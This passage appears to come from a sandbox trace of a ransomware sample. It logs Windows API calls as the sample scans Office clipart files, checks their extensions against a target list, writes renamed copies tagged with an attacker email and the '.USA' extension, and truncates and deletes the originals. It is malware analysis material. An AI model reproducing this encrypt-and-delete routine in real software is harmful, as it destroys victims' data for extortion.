Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.171] lstrlenW (lpString=".jpg") returned 4 [0269.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.172] lstrlenW (lpString=".doc") returned 4 [0269.172] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.172] lstrlenW (lpString=".docx") returned 5 [0269.172] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.172] lstrlenW (lpString=".pdf") returned 4 [0269.172] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.172] lstrlenW (lpString=".xls") returned 4 [0269.172] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.172] lstrlenW (lpString=".xlsx") returned 5 [0269.172] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.172] lstrlenW (lpString=".ppt") returned 4 [0269.172] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.172] lstrlenW (lpString=".zip") returned 4 [0269.172] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.172] lstrlenW (lpString=".rar") returned 4 [0269.172] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.172] lstrlenW (lpString=".bz2") returned 4 [0269.172] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.172] lstrlenW (lpString=".7z") returned 3 [0269.172] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.172] lstrlenW (lpString=".dbf") returned 4 [0269.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.173] lstrlenW (lpString=".1cd") returned 4 [0269.173] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0269.173] lstrlenW (lpString=".jpg") returned 4 [0269.173] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.173] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.173] lstrlenW (lpString="DD01143_.WMF") returned 12 [0269.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.173] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2140) returned 1 [0269.174] CloseHandle (hObject=0x384) returned 1 [0269.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 0x20 [0269.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.174] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.174] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.174] GetLastError () returned 0x0 [0269.174] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x85c, lpOverlapped=0x0) returned 1 [0269.176] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x860, lpOverlapped=0x0) returned 1 [0269.176] ReadFile (in: hFile=0x384, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.177] WriteFile (in: hFile=0x388, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.177] SetEndOfFile (hFile=0x388) returned 1 [0269.177] CloseHandle (hObject=0x388) returned 1 [0269.177] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.177] SetEndOfFile (hFile=0x384) returned 1 [0269.178] CloseHandle (hObject=0x384) returned 1 [0269.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf")) returned 1 [0269.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.179] lstrlenW (lpString=".doc") returned 4 [0269.179] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.179] lstrlenW (lpString=".docx") returned 5 [0269.179] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.179] lstrlenW (lpString=".pdf") returned 4 [0269.179] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.179] lstrlenW (lpString=".xls") returned 4 [0269.179] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.179] lstrlenW (lpString=".xlsx") returned 5 [0269.179] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.179] lstrlenW (lpString=".ppt") returned 4 [0269.179] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.180] lstrlenW (lpString=".zip") returned 4 [0269.180] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.180] lstrlenW (lpString=".rar") returned 4 [0269.180] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString=".bz2") returned 4 [0269.180] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString=".7z") returned 3 [0269.180] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.180] lstrlenW (lpString=".dbf") returned 4 [0269.180] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.180] lstrlenW (lpString=".1cd") returned 4 [0269.180] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.180] lstrlenW (lpString=".jpg") returned 4 [0269.180] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.180] lstrlenW (lpString=".doc") returned 4 [0269.180] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString=".docx") returned 5 [0269.180] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.180] lstrlenW (lpString=".pdf") returned 4 [0269.180] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.180] lstrlenW (lpString=".xls") returned 4 [0269.180] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.180] lstrlenW (lpString=".xlsx") returned 5 [0269.180] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.180] lstrlenW (lpString=".ppt") returned 4 [0269.181] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.181] lstrlenW (lpString=".zip") returned 4 [0269.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.181] lstrlenW (lpString=".rar") returned 4 [0269.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.181] lstrlenW (lpString=".bz2") returned 4 [0269.181] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.181] lstrlenW (lpString=".7z") returned 3 [0269.181] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.181] lstrlenW (lpString=".dbf") returned 4 [0269.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.181] lstrlenW (lpString=".1cd") returned 4 [0269.181] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 63 [0269.181] lstrlenW (lpString=".jpg") returned 4 [0269.181] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.362] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.362] lstrlenW (lpString="DD01162_.WMF") returned 12 [0269.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0269.370] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2300) returned 1 [0269.370] CloseHandle (hObject=0x3a4) returned 1 [0269.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 0x20 [0269.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0269.370] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.370] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0269.371] GetLastError () returned 0x0 [0269.371] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x8fc, lpOverlapped=0x0) returned 1 [0269.393] WriteFile (in: hFile=0x3a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x900, lpOverlapped=0x0) returned 1 [0269.394] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.394] WriteFile (in: hFile=0x3a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.394] SetEndOfFile (hFile=0x3a8) returned 1 [0269.394] CloseHandle (hObject=0x3a8) returned 1 [0269.394] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.394] SetEndOfFile (hFile=0x3a4) returned 1 [0269.399] CloseHandle (hObject=0x3a4) returned 1 [0269.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.471] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01162_.wmf")) returned 1 [0269.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.472] lstrlenW (lpString=".doc") returned 4 [0269.472] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.472] lstrlenW (lpString=".docx") returned 5 [0269.472] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.472] lstrlenW (lpString=".pdf") returned 4 [0269.472] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.472] lstrlenW (lpString=".xls") returned 4 [0269.472] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.472] lstrlenW (lpString=".xlsx") returned 5 [0269.472] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.472] lstrlenW (lpString=".ppt") returned 4 [0269.472] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.472] lstrlenW (lpString=".zip") returned 4 [0269.472] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.472] lstrlenW (lpString=".rar") returned 4 [0269.472] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.472] lstrlenW (lpString=".bz2") returned 4 [0269.472] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.472] lstrlenW (lpString=".7z") returned 3 [0269.472] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.472] lstrlenW (lpString=".dbf") returned 4 [0269.472] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.472] lstrlenW (lpString=".1cd") returned 4 [0269.472] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.473] lstrlenW (lpString=".jpg") returned 4 [0269.473] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.476] lstrlenW (lpString=".doc") returned 4 [0269.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.476] lstrlenW (lpString=".docx") returned 5 [0269.477] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.477] lstrlenW (lpString=".pdf") returned 4 [0269.477] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString=".xls") returned 4 [0269.477] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.477] lstrlenW (lpString=".xlsx") returned 5 [0269.477] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.477] lstrlenW (lpString=".ppt") returned 4 [0269.477] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.477] lstrlenW (lpString=".zip") returned 4 [0269.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.477] lstrlenW (lpString=".rar") returned 4 [0269.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString=".bz2") returned 4 [0269.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString=".7z") returned 3 [0269.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.477] lstrlenW (lpString=".dbf") returned 4 [0269.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.477] lstrlenW (lpString=".1cd") returned 4 [0269.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 63 [0269.477] lstrlenW (lpString=".jpg") returned 4 [0269.478] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.478] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0269.478] lstrlenW (lpString="DD01170_.WMF") returned 12 [0269.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0269.478] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2404) returned 1 [0269.478] CloseHandle (hObject=0x3a4) returned 1 [0269.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 0x20 [0269.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0269.479] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.479] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0269.479] GetLastError () returned 0x0 [0269.479] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x964, lpOverlapped=0x0) returned 1 [0269.491] WriteFile (in: hFile=0x3a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x970, lpOverlapped=0x0) returned 1 [0269.492] ReadFile (in: hFile=0x3a4, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.492] WriteFile (in: hFile=0x3a8, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.492] SetEndOfFile (hFile=0x3a8) returned 1 [0269.546] CloseHandle (hObject=0x3a8) returned 1 [0269.870] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.870] SetEndOfFile (hFile=0x3a4) returned 1 [0269.876] CloseHandle (hObject=0x3a4) returned 1 [0269.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.933] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 1 [0269.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.933] lstrlenW (lpString=".doc") returned 4 [0269.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.933] lstrlenW (lpString=".docx") returned 5 [0269.933] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.933] lstrlenW (lpString=".pdf") returned 4 [0269.934] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.934] lstrlenW (lpString=".xls") returned 4 [0269.934] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.934] lstrlenW (lpString=".xlsx") returned 5 [0269.934] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.934] lstrlenW (lpString=".ppt") returned 4 [0269.934] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.934] lstrlenW (lpString=".zip") returned 4 [0269.934] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.934] lstrlenW (lpString=".rar") returned 4 [0269.934] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.934] lstrlenW (lpString=".bz2") returned 4 [0269.934] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.934] lstrlenW (lpString=".7z") returned 3 [0269.934] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.934] lstrlenW (lpString=".dbf") returned 4 [0269.935] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.935] lstrlenW (lpString=".1cd") returned 4 [0269.935] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.935] lstrlenW (lpString=".jpg") returned 4 [0269.935] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0269.935] lstrlenW (lpString=".doc") returned 4 [0269.935] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.935] lstrlenW (lpString=".docx") returned 5 [0269.935] lstrcmpiW (lpString1=".docx", 